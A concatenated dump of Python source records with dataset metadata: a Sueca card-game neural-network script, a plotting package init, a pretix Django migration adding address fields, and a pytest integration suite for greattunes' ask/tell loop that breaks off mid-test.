] | null | null | null | Machine learning/Reinforcement Learning/sueca-master/python/nn/nn_main.py | vascobailao/Python | 37473ab5c9629b77f0b618737473276716df4e4f | [
"MIT"
] | null | null | null | Machine learning/Reinforcement Learning/sueca-master/python/nn/nn_main.py | vascobailao/Python | 37473ab5c9629b77f0b618737473276716df4e4f | [
"MIT"
] | null | null | null | from nn.pyBrainNN import NeuralNetwork
import numpy as np
NN = NeuralNetwork()
input = np.array([0., 0., 0., 0., 0., 0. , 0., 0. , 0. , 0. , 0., 0. , 0. , 0., 0. , 1. , 0., 0.,
0., 1., 0. ,0. ,0. , 0., 0. , 0., 0., 0., 0., 0. , 0., 0., 0., 0. , 0. , 0.,
0. ,0. , 1. , 0., 0.02857143 , 0.02857143, 0.02857143 , 0.02857143 , 0.02857143 , 0.02857143,
0.02857143 , 0.02857143, 0.02857143 , 0.02857143 , 0.02857143 ,0.02857143,
0.02857143 , 0.02857143 , 0.02857143 , 0.,0.02857143, 0.,
0.02857143 ,0. , 0.02857143 , 0.02857143 , 0.02857143 ,0.02857143,
0.02857143, 0., 0.02857143 ,0.02857143, 0.02857143 , 0.02857143,
0.02857143 ,0.02857143 ,0.02857143, 0.02857143 ,0.02857143, 0.02857143,
0.02857143 , 0.02857143 ,0., 0.02857143])
Y = NN.test(input)
print(Y*22) | 53.666667 | 101 | 0.56646 | 136 | 805 | 3.352941 | 0.125 | 0.171053 | 0.745614 | 1.144737 | 0.789474 | 0.789474 | 0.789474 | 0.785088 | 0.785088 | 0.785088 | 0 | 0.572785 | 0.214907 | 805 | 15 | 102 | 53.666667 | 0.148734 | 0 | 0 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0.071429 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
02602a7446e38ce00ca7888e7b0ec6bd6c9e0781 | 230 | py | Python | tools/plot/__init__.py | LJ-Jiahe/fuzzy_measure_fusion | d265f3266548eb5f7a629710b200d6b253955cd8 | [
"MIT"
] | null | null | null | tools/plot/__init__.py | LJ-Jiahe/fuzzy_measure_fusion | d265f3266548eb5f7a629710b200d6b253955cd8 | [
"MIT"
] | null | null | null | tools/plot/__init__.py | LJ-Jiahe/fuzzy_measure_fusion | d265f3266548eb5f7a629710b200d6b253955cd8 | [
"MIT"
] | null | null | null | from tools.plot.plot_distributions import *
from tools.plot.plot_models import *
from tools.plot.plot_NPP import *
from tools.plot.plot_operators import *
from tools.plot.plot_seenVSunseen import *
from tools.plot.plot_NS import * | 38.333333 | 43 | 0.821739 | 36 | 230 | 5.083333 | 0.277778 | 0.295082 | 0.42623 | 0.557377 | 0.628415 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1 | 230 | 6 | 44 | 38.333333 | 0.884058 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
5a0a6855b45d51ebddeb09832a67a6fa86d93b3f | 2,308 | py | Python | src/pretix/base/migrations/0150_auto_20200401_1123.py | fabm3n/pretix | 520fb620888d5c434665a6a4a33cb2ab22dd42c7 | [
"Apache-2.0"
] | 1,248 | 2015-04-24T13:32:06.000Z | 2022-03-29T07:01:36.000Z | src/pretix/base/migrations/0150_auto_20200401_1123.py | fabm3n/pretix | 520fb620888d5c434665a6a4a33cb2ab22dd42c7 | [
"Apache-2.0"
] | 2,113 | 2015-02-18T18:58:16.000Z | 2022-03-31T11:12:32.000Z | src/pretix/base/migrations/0150_auto_20200401_1123.py | fabm3n/pretix | 520fb620888d5c434665a6a4a33cb2ab22dd42c7 | [
"Apache-2.0"
] | 453 | 2015-05-13T09:29:06.000Z | 2022-03-24T13:39:16.000Z | # Generated by Django 3.0.4 on 2020-04-01 11:24
import django_countries.fields
from django.db import migrations, models
class Migration(migrations.Migration):
    dependencies = [
        ('pretixbase', '0149_order_cancellation_date'),
    ]

    operations = [
        migrations.AddField(
            model_name='cartposition',
            name='city',
            field=models.CharField(max_length=255, null=True),
        ),
        migrations.AddField(
            model_name='cartposition',
            name='company',
            field=models.CharField(max_length=255, null=True),
        ),
        migrations.AddField(
            model_name='cartposition',
            name='country',
            field=django_countries.fields.CountryField(max_length=2, null=True),
        ),
        migrations.AddField(
            model_name='cartposition',
            name='state',
            field=models.CharField(max_length=255, null=True),
        ),
        migrations.AddField(
            model_name='cartposition',
            name='street',
            field=models.TextField(null=True),
        ),
        migrations.AddField(
            model_name='cartposition',
            name='zipcode',
            field=models.CharField(max_length=30, null=True),
        ),
        migrations.AddField(
            model_name='orderposition',
            name='city',
            field=models.CharField(max_length=255, null=True),
        ),
        migrations.AddField(
            model_name='orderposition',
            name='company',
            field=models.CharField(max_length=255, null=True),
        ),
        migrations.AddField(
            model_name='orderposition',
            name='country',
            field=django_countries.fields.CountryField(max_length=2, null=True),
        ),
        migrations.AddField(
            model_name='orderposition',
            name='state',
            field=models.CharField(max_length=255, null=True),
        ),
        migrations.AddField(
            model_name='orderposition',
            name='street',
            field=models.TextField(null=True),
        ),
        migrations.AddField(
            model_name='orderposition',
            name='zipcode',
            field=models.CharField(max_length=30, null=True),
        ),
    ]
| 30.773333 | 80 | 0.560225 | 211 | 2,308 | 5.995261 | 0.236967 | 0.170751 | 0.218182 | 0.256126 | 0.853755 | 0.853755 | 0.822925 | 0.822925 | 0.751779 | 0.751779 | 0 | 0.027599 | 0.324957 | 2,308 | 74 | 81 | 31.189189 | 0.784339 | 0.019497 | 0 | 0.882353 | 1 | 0 | 0.114993 | 0.012384 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.029412 | 0 | 0.073529 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
5a0d23a04b4f26a0f486d191855f5b0e9b25631e | 66,101 | py | Python | tests/integration/test_CreativeProject_ask_tell_functional.py | svedel/greattunes | e241d0f6a30479b600d85aafabf27058d3fd1072 | [
"MIT"
] | null | null | null | tests/integration/test_CreativeProject_ask_tell_functional.py | svedel/greattunes | e241d0f6a30479b600d85aafabf27058d3fd1072 | [
"MIT"
] | 20 | 2021-07-14T06:44:56.000Z | 2022-03-17T05:06:23.000Z | tests/integration/test_CreativeProject_ask_tell_functional.py | svedel/greattunes | e241d0f6a30479b600d85aafabf27058d3fd1072 | [
"MIT"
] | null | null | null | import functools
import pytest
import torch
from greattunes import TuneSession
from greattunes.data_format_mappings import tensor2pretty_response, tensor2pretty_covariate
@pytest.mark.parametrize(
"covars, model_type, train_X, train_Y, covars_proposed_iter, covars_sampled_iter, response_sampled_iter, random_start",
[
[[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0, False], # the case where no data is available (starts by training model)
[[(1, 0.5, 1.5)], "SimpleCustomMaternGP", None, None, 0, 0, 0, False], # the case where no data is available (starts by training model)
[[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0, True], # case 1 with random start
[[(1, 0.5, 1.5)], "SimpleCustomMaternGP", None, None, 0, 0, 0, True], # case 2 with random start
[[(1, 0.5, 1.5)], "SingleTaskGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, False],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, False],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SimpleCustomMaternGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, False]
]
)
def test_CreativeProject_ask_integration_test_works(covars, model_type, train_X, train_Y, covars_proposed_iter,
covars_sampled_iter, response_sampled_iter, random_start):
"""
test the positive cases for TuneSession.ask method.
"""
# initialize the class
cc = TuneSession(covars=covars, model=model_type, random_start=random_start)
# set attributes on class (to simulate previous iterations of ask/tell functionality)
cc.train_X = train_X
cc.proposed_X = train_X
cc.train_Y = train_Y
cc.model["covars_proposed_iter"] = covars_proposed_iter
cc.model["covars_sampled_iter"] = covars_sampled_iter
cc.model["response_sampled_iter"] = response_sampled_iter
if covars_proposed_iter > 0:
cc.num_initial_random_points = 0
cc.random_sampling_method = None
# run the method
cc.ask()
# check that an entry has been added to cls.proposed_X
if train_Y is not None:
assert cc.proposed_X.size()[0] == train_X.size()[0] + 1
assert cc.proposed_X[-1].size()[0] == train_X.size()[1] # check that the new candidate has the right number of entries
else:
assert cc.proposed_X.size()[0] == 1
# check that a model and an acquisition function have been assigned if starting from no data (train_X, train_Y is None)
if train_Y is not None:
assert cc.acq_func["object"] is not None
assert cc.model["model"] is not None
# assert that the number of covars in returned "proposed_X" matches the number from "covars"
assert cc.proposed_X.size()[1] == len(covars)
# check that the counter 'covars_proposed_iter' is updated
assert cc.model["covars_proposed_iter"] == covars_proposed_iter +1
@pytest.mark.parametrize(
"covars, model_type, train_X, train_Y, covars_proposed_iter, covars_sampled_iter, response_sampled_iter, error_msg",
[
[[(1, 0.5, 1.5)], "SingleTaskGP", None, torch.tensor([[0.8]], dtype=torch.double), 0, 0, 0, "greattunes.greattunes._acq_func.AcqFunction.set_acq_func: no surrogate model set (self.model['model'] is None)"], # the case where no COVARIATE data is available
[[(1, 0.5, 1.5)], "SingleTaskGP", None, torch.tensor([[0.8], [22]], dtype=torch.double), 0, 0, 0, "greattunes.greattunes._acq_func.AcqFunction.set_acq_func: no surrogate model set (self.model['model'] is None)"], # the case where no COVARIATE data is available, multiple observations
]
)
def test_CreativeProject_ask_integration_test_fails(covars, model_type, train_X, train_Y, covars_proposed_iter,
covars_sampled_iter, response_sampled_iter, error_msg):
"""
test the negative cases for TuneSession.ask method. Currently testing the case where only train_Y data has been
added, not train_X data
"""
# initialize the class
cc = TuneSession(covars=covars, model=model_type)
# set attributes on class (to simulate previous iterations of ask/tell functionality)
cc.train_X = train_X
cc.proposed_X = train_X
cc.train_Y = train_Y
cc.model["covars_proposed_iter"] = covars_proposed_iter
cc.model["covars_sampled_iter"] = covars_sampled_iter
cc.model["response_sampled_iter"] = response_sampled_iter
# run the method
with pytest.raises(Exception) as e:
cc.ask()
assert str(e.value) == error_msg
@pytest.mark.parametrize(
"covars, model_type, train_X, train_Y, covars_proposed_iter, covars_sampled_iter, response_sampled_iter",
[
[[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0], # the case where no data is available (starts by training model)
[[(1, 0.5, 1.5)], "SimpleCustomMaternGP", None, None, 0, 0, 0], # the case where no data is available (starts by training model)
[[(1, 0.5, 1.5)], "SingleTaskGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 2, 1, 1],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 2, 1, 1],
[[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SimpleCustomMaternGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 2, 1, 1]
]
)
def test_CreativeProject_tell_integration_test_works(covars, model_type, train_X, train_Y, covars_proposed_iter,
covars_sampled_iter, response_sampled_iter, monkeypatch):
"""
test the positive cases for TuneSession.tell method. Monkeypatch "_read_covars_manual_input" and
"_read_response_manual_input" from ._observe.py to circumvent manual input via builtins.input
"""
# initialize the class
cc = TuneSession(covars=covars, model=model_type)
# set attributes on class (to simulate previous iterations of ask/tell functionality)
cc.train_X = train_X
cc.proposed_X = train_X
cc.train_Y = train_Y
cc.model["covars_proposed_iter"] = covars_proposed_iter
cc.model["covars_sampled_iter"] = covars_sampled_iter
cc.model["response_sampled_iter"] = response_sampled_iter
# monkeypatch "_read_covars_manual_input"
candidate_tensor = torch.tensor([[tmp[0] for tmp in covars]], dtype=torch.double)
def mock_read_covars_manual_input(additional_text):
return candidate_tensor
monkeypatch.setattr(cc, "_read_covars_manual_input", mock_read_covars_manual_input)
# monkeypatch "_read_response_manual_input"
resp_tensor = torch.tensor([[12]], dtype=torch.double)
def mock_read_response_manual_input(additional_text):
return resp_tensor
monkeypatch.setattr(cc, "_read_response_manual_input", mock_read_response_manual_input)
# run the method
cc.tell()
# assert that a model has been added (start from cc.model["model"] = None)
assert cc.model["model"] is not None
# assert that a new observation has been added for covariates
if train_X is not None:
assert cc.train_X.size()[0] == train_X.size()[0] + 1
else:
assert cc.train_X.size()[0] == 1
# assert that the right elements have been added to the covariate observation
for i in range(cc.train_X.size()[1]):
assert cc.train_X[-1, i].item() == candidate_tensor[0, i].item()
# assert that a new observation has been added for the response
if train_Y is not None:
assert cc.train_Y.size()[0] == train_Y.size()[0] + 1
else:
assert cc.train_Y.size()[1] == 1
# assert that the right elements have been added to the response observation
assert cc.train_Y[-1, 0].item() == resp_tensor[0, 0].item()
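# The monkeypatch-based stubbing used in these tests replaces a bound method
# with a plain function set directly on the instance, which is why the mocks
# take only "additional_text". A dependency-free sketch of that pattern (the
# "Session" class below is a hypothetical stand-in for TuneSession, not
# greattunes code):

```python
# Minimal sketch of the instance-level input-stubbing pattern used above.
# "Session" is a hypothetical stand-in for TuneSession.
class Session:
    def _read_covars_manual_input(self, additional_text):
        # in the real class this would block on builtins.input
        raise RuntimeError("would require manual input")

    def tell(self):
        return self._read_covars_manual_input("covars: ")


session = Session()

# pytest's monkeypatch.setattr(cc, "_read_covars_manual_input", fn) amounts to
# setting an instance attribute, which shadows the class-level method; the
# replacement is a plain function, so it receives only "additional_text"
canned = [[0.5]]
setattr(session, "_read_covars_manual_input", lambda additional_text: canned)

assert session.tell() == [[0.5]]
```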


@pytest.mark.parametrize(
    "covars, model_type, train_X, train_Y, covars_proposed_iter, covars_sampled_iter, response_sampled_iter",
    [
        [[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 1, 0, 0],  # the case where no data is available (starts by training model)
        [[(1, 0.5, 1.5)], "SimpleCustomMaternGP", None, None, 1, 0, 0],  # the case where no data is available (starts by training model)
        [[(1, 0.5, 1.5)], "SingleTaskGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1],
        [[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1],
        [[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SimpleCustomMaternGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1]
    ]
)
def test_CreativeProject_tell_integration_test_works_overwrite(covars, model_type, train_X, train_Y, covars_proposed_iter,
covars_sampled_iter, response_sampled_iter, monkeypatch):
"""
test the positive case for TuneSession.tell method where last datapoint is overwritten (controlled by
covars_proposed_iter <= covars_sampled_iter). Monkeypatch "_read_covars_manual_input" and
"_read_response_manual_input" from ._observe.py to circumvent manual input via builtins.input
"""
# initialize the class
cc = TuneSession(covars=covars, model=model_type)
# set attributes on class (to simulate previous iterations of ask/tell functionality)
cc.train_X = train_X
cc.proposed_X = train_X
cc.train_Y = train_Y
cc.model["covars_proposed_iter"] = covars_proposed_iter
cc.model["covars_sampled_iter"] = covars_sampled_iter
cc.model["response_sampled_iter"] = response_sampled_iter
# monkeypatch "_read_covars_manual_input"
candidate_tensor = torch.tensor([[tmp[0] for tmp in covars]], dtype=torch.double)
def mock_read_covars_manual_input(additional_text):
return candidate_tensor
monkeypatch.setattr(cc, "_read_covars_manual_input", mock_read_covars_manual_input)
# monkeypatch "_read_response_manual_input"
resp_tensor = torch.tensor([[12]], dtype=torch.double)
def mock_read_response_manual_input(additional_text):
return resp_tensor
monkeypatch.setattr(cc, "_read_response_manual_input", mock_read_response_manual_input)
# run the method
cc.tell()
# assert that a model has been added (start from cc.model["model"] = None)
assert cc.model["model"] is not None
# assert that NO new observation has been added for covariates
if train_X is not None:
assert cc.train_X.size()[0] == train_X.size()[0]
else:
assert cc.train_X.size()[0] == 1
# assert that the right elements have been added to the covariate observation (last row overwritten)
for i in range(cc.train_X.size()[1]):
assert cc.train_X[-1, i].item() == candidate_tensor[0, i].item()
# assert that NO new observation has been added for the response
if train_Y is not None:
assert cc.train_Y.size()[0] == train_Y.size()[0]
else:
assert cc.train_Y.size()[1] == 1
# assert that the right elements have been added to the response observation (last row overwritten)
assert cc.train_Y[-1, 0].item() == resp_tensor[0, 0].item()


# test failures in tell (e.g. incorrect input): make sure nothing is updated
@pytest.mark.parametrize(
    "covars, model_type, train_X, train_Y, covars_proposed_iter, covars_sampled_iter, response_sampled_iter, covars_cand, resp_cand, error_msg",
    [
        [[(1, 0.5, 1.5)], "SingleTaskGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[1, 2]], dtype=torch.double), torch.tensor([[23]], dtype=torch.double), "greattunes._observe._get_and_verify_covars_input: unable to get acceptable covariate input in 3 iterations. Was expecting something like 'tensor([0.8000], dtype=torch.float64)', but got 'tensor([[1., 2.]], dtype=torch.float64)'"],  # fail on train_X
        [[(1, 0.5, 1.5)], "SimpleCustomMaternGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[1, 2]], dtype=torch.double), torch.tensor([[23]], dtype=torch.double), "greattunes._observe._get_and_verify_covars_input: unable to get acceptable covariate input in 3 iterations. Was expecting something like 'tensor([0.8000], dtype=torch.float64)', but got 'tensor([[1., 2.]], dtype=torch.float64)'"],  # fail on train_X
        [[(1, 0.5, 1.5)], "SingleTaskGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[1]], dtype=torch.double), torch.tensor([[23, 11]], dtype=torch.double), "greattunes._observe._get_and_verify_response_input: incorrect number of variables provided. Was expecting input of size (1,1) but received torch.Size([1, 2])"],  # fail on train_Y
        [[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[1, 2]], dtype=torch.double), torch.tensor([[23]], dtype=torch.double), "greattunes._observe._get_and_verify_covars_input: unable to get acceptable covariate input in 3 iterations. Was expecting something like 'tensor([ 0.8000, 0.2000, 102.0000], dtype=torch.float64)', but got 'tensor([[1., 2.]], dtype=torch.float64)'"],  # fail on train_X, too few entries
        [[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[1, 2, 3]], dtype=torch.double), torch.tensor([], dtype=torch.double), "greattunes._observe._get_and_verify_response_input: incorrect number of variables provided. Was expecting input of size (1,1) but received torch.Size([0])"],  # fail on train_Y, too few entries
        [[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[1, 2]], dtype=torch.double), torch.tensor([], dtype=torch.double), "greattunes._observe._get_and_verify_covars_input: unable to get acceptable covariate input in 3 iterations. Was expecting something like 'tensor([ 0.8000, 0.2000, 102.0000], dtype=torch.float64)', but got 'tensor([[1., 2.]], dtype=torch.float64)'"]  # too few in both train_X and train_Y, fail on train_X since this comes first
    ]
)
def test_CreativeProject_tell_integration_test_fails(covars, model_type, train_X, train_Y, covars_proposed_iter,
covars_sampled_iter, response_sampled_iter, covars_cand, resp_cand,
error_msg, monkeypatch):
"""
test that a failure in "tell" will cause an error and not update any counters. Monkeypatch
"_read_covars_manual_input" and "_read_response_manual_input" from ._observe.py to circumvent manual input via
builtins.input
"""
# initialize the class
cc = TuneSession(covars=covars, model=model_type)
# set attributes on class (to simulate previous iterations of ask/tell functionality)
cc.train_X = train_X
cc.proposed_X = train_X
cc.train_Y = train_Y
cc.model["covars_proposed_iter"] = covars_proposed_iter
cc.model["covars_sampled_iter"] = covars_sampled_iter
cc.model["response_sampled_iter"] = response_sampled_iter
# original model state
model_state = cc.model["model"]
# monkeypatch "_read_covars_manual_input"
candidate_tensor = covars_cand
def mock_read_covars_manual_input(additional_text):
return candidate_tensor
monkeypatch.setattr(cc, "_read_covars_manual_input", mock_read_covars_manual_input)
# monkeypatch "_read_response_manual_input"
resp_tensor = resp_cand
def mock_read_response_manual_input(additional_text):
return resp_tensor
monkeypatch.setattr(cc, "_read_response_manual_input", mock_read_response_manual_input)
with pytest.raises(Exception) as e:
# run the method
cc.tell()
assert str(e.value) == error_msg
# assert that stored train_X is not updated
assert cc.train_X.size()[0] == train_X.size()[0]
assert cc.train_X.size()[1] == train_X.size()[1]
# assert that stored train_Y is not updated
assert cc.train_Y.size()[0] == train_Y.size()[0]
assert cc.train_Y.size()[1] == train_Y.size()[1]
# assert that stored surrogate model is not updated
assert cc.model["model"] == model_state


@pytest.mark.parametrize(
    "covars, model_type, train_X, train_Y, covars_proposed_iter, covars_sampled_iter, response_sampled_iter, random_start",
    [
        [[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0, False],  # the case where no data is available (starts by training model)
        [[(1, 0.5, 1.5)], "SimpleCustomMaternGP", None, None, 0, 0, 0, False],  # the case where no data is available (starts by training model)
        [[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0, True],  # case 1 with random start
        [[(1, 0.5, 1.5)], "SimpleCustomMaternGP", None, None, 0, 0, 0, True],  # case 2 with random start
        [[(1, 0.5, 1.5)], "SingleTaskGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, False],
        [[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, False],
        [[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SimpleCustomMaternGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, False]
    ]
)
def test_CreativeProject_integration_ask_tell_one_loop_works(covars, model_type, train_X, train_Y,
covars_proposed_iter, covars_sampled_iter,
response_sampled_iter, random_start, monkeypatch):
"""
test that a single loop of ask/tell works: creates a candidate, creates a model, stores covariates and response.
Monkeypatch "_read_covars_manual_input" and "_read_response_manual_input" from ._observe.py to circumvent manual
input via builtins.input. Does not use the kwargs for covariates
"""
# initialize the class
cc = TuneSession(covars=covars, model=model_type, random_start=random_start)
# set attributes on class (to simulate previous iterations of ask/tell functionality)
cc.train_X = train_X
cc.proposed_X = train_X
cc.train_Y = train_Y
cc.model["covars_proposed_iter"] = covars_proposed_iter
cc.model["covars_sampled_iter"] = covars_sampled_iter
cc.model["response_sampled_iter"] = response_sampled_iter
if covars_proposed_iter > 0:
cc.num_initial_random_points = 0
cc.random_sampling_method = None
# monkeypatch "_read_covars_manual_input"
candidate_tensor = torch.tensor([[tmp[0] for tmp in covars]], dtype=torch.double)
def mock_read_covars_manual_input(additional_text):
return candidate_tensor
monkeypatch.setattr(cc, "_read_covars_manual_input", mock_read_covars_manual_input)
# monkeypatch "_read_response_manual_input"
resp_tensor = torch.tensor([[12]], dtype=torch.double)
def mock_read_response_manual_input(additional_text):
return resp_tensor
monkeypatch.setattr(cc, "_read_response_manual_input", mock_read_response_manual_input)
# run the ask method
cc.ask()
# run the tell method
cc.tell()
### assert for ask ###
# check that an entry has been added to cls.proposed_X
if train_Y is not None:
assert cc.proposed_X.size()[0] == train_X.size()[0] + 1
assert cc.proposed_X[-1].size()[0] == train_X.size()[1] # check that the new candidate has the right number of entries
else:
assert cc.proposed_X.size()[0] == 1
# assert that the number of covars in returned "proposed_X" matches the number from "covars"
assert cc.proposed_X.size()[1] == len(covars)
# check that the counter 'covars_proposed_iter' is updated
assert cc.model["covars_proposed_iter"] == covars_proposed_iter + 1
### check for tell ###
# assert that a new observation has been added for covariates
if train_X is not None:
assert cc.train_X.size()[0] == train_X.size()[0] + 1
else:
assert cc.train_X.size()[0] == 1
# assert that the right elements have been added to the covariate observation
for i in range(cc.train_X.size()[1]):
assert cc.train_X[-1, i].item() == candidate_tensor[0, i].item()
# assert that a new observation has been added for the response
if train_Y is not None:
assert cc.train_Y.size()[0] == train_Y.size()[0] + 1
else:
assert cc.train_Y.size()[1] == 1
# assert that the right elements have been added to the response observation
assert cc.train_Y[-1, 0].item() == resp_tensor[0, 0].item()
### check that acquisition function and model have been added
# check that a model function has been assigned (should happen in all cases as part of tell)
assert cc.model["model"] is not None
# check that an acquisition function has been added (only if some data present in train_X, train_Y at first step)
if train_X is not None:
assert cc.acq_func["object"] is not None


@pytest.mark.parametrize(
    "covars, model_type, train_X, train_Y, covars_proposed_iter, covars_sampled_iter, response_sampled_iter, kwarg_covariates, random_start",
    [
        [[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0, torch.tensor([[1.8]], dtype=torch.double), False],  # the case where no data is available (starts by training model)
        [[(1, 0.5, 1.5)], "SimpleCustomMaternGP", None, None, 0, 0, 0, torch.tensor([[1.8]], dtype=torch.double), False],  # the case where no data is available (starts by training model)
        [[(1, 0.5, 1.5)], "SingleTaskGP", None, None, 0, 0, 0, torch.tensor([[1.8]], dtype=torch.double), True],  # case 1 with random start
        [[(1, 0.5, 1.5)], "SimpleCustomMaternGP", None, None, 0, 0, 0, torch.tensor([[1.8]], dtype=torch.double), True],  # case 2 with random start
        [[(1, 0.5, 1.5)], "SingleTaskGP", torch.tensor([[0.8]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[1.8]], dtype=torch.double), False],
        [[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SingleTaskGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[0.8, 0.2, 103]], dtype=torch.double), False],
        [[(1, 0.5, 1.5), (-3, -4, 1.1), (100, 98.0, 106.7)], "SimpleCustomMaternGP", torch.tensor([[0.8, 0.2, 102]], dtype=torch.double), torch.tensor([[22]], dtype=torch.double), 1, 1, 1, torch.tensor([[0.8, 0.2, 103]], dtype=torch.double), False]
    ]
)
def test_CreativeProject_integration_ask_tell_one_loop_kwarg_covars_works(covars, model_type, train_X, train_Y,
covars_proposed_iter, covars_sampled_iter,
response_sampled_iter, kwarg_covariates, random_start,
monkeypatch):
"""
test that a single loop of ask/tell works when providing covars as kwarg to tell: creates a candidate, creates a
model, stores covariates and response. Monkeypatch "_read_response_manual_input" from ._observe.py to circumvent
manual input via builtins.input and provides covariates via kwargs
"""
# initialize the class
cc = TuneSession(covars=covars, model=model_type, random_start=random_start)
# set attributes on class (to simulate previous iterations of ask/tell functionality)
cc.train_X = train_X
cc.proposed_X = train_X
cc.train_Y = train_Y
cc.model["covars_proposed_iter"] = covars_proposed_iter
cc.model["covars_sampled_iter"] = covars_sampled_iter
cc.model["response_sampled_iter"] = response_sampled_iter
if covars_proposed_iter > 0:
cc.num_initial_random_points = 0
cc.random_sampling_method = None
# # monkeypatch "_read_covars_manual_input"
# candidate_tensor = torch.tensor([[tmp[0] for tmp in covars]], dtype=torch.double)
#
# def mock_read_covars_manual_input(additional_text):
# return candidate_tensor
#
# monkeypatch.setattr(cc, "_read_covars_manual_input", mock_read_covars_manual_input)
# monkeypatch "_read_response_manual_input"
resp_tensor = torch.tensor([[12]], dtype=torch.double)
def mock_read_response_manual_input(additional_text):
return resp_tensor
monkeypatch.setattr(cc, "_read_response_manual_input", mock_read_response_manual_input)
# run the ask method
cc.ask()
# run the tell method
cc.tell(covar_obs=kwarg_covariates)
### check for tell (no reason to assert for ask)###
# assert that a new observation has been added for covariates
if train_X is not None:
assert cc.train_X.size()[0] == train_X.size()[0] + 1
else:
assert cc.train_X.size()[0] == 1
# assert that the right elements have been added to the covariate observation
for i in range(cc.train_X.size()[1]):
assert cc.train_X[-1, i].item() == kwarg_covariates[0, i].item() #candidate_tensor[0, i].item()
# assert that a new observation has been added for the response
if train_Y is not None:
assert cc.train_Y.size()[0] == train_Y.size()[0] + 1
else:
assert cc.train_Y.size()[1] == 1
# assert that the right elements have been added to the response observation
assert cc.train_Y[-1, 0].item() == resp_tensor[0, 0].item()
### check that acquisition function and model have been added
# check that a model function has been assigned (should happen in all cases as part of tell)
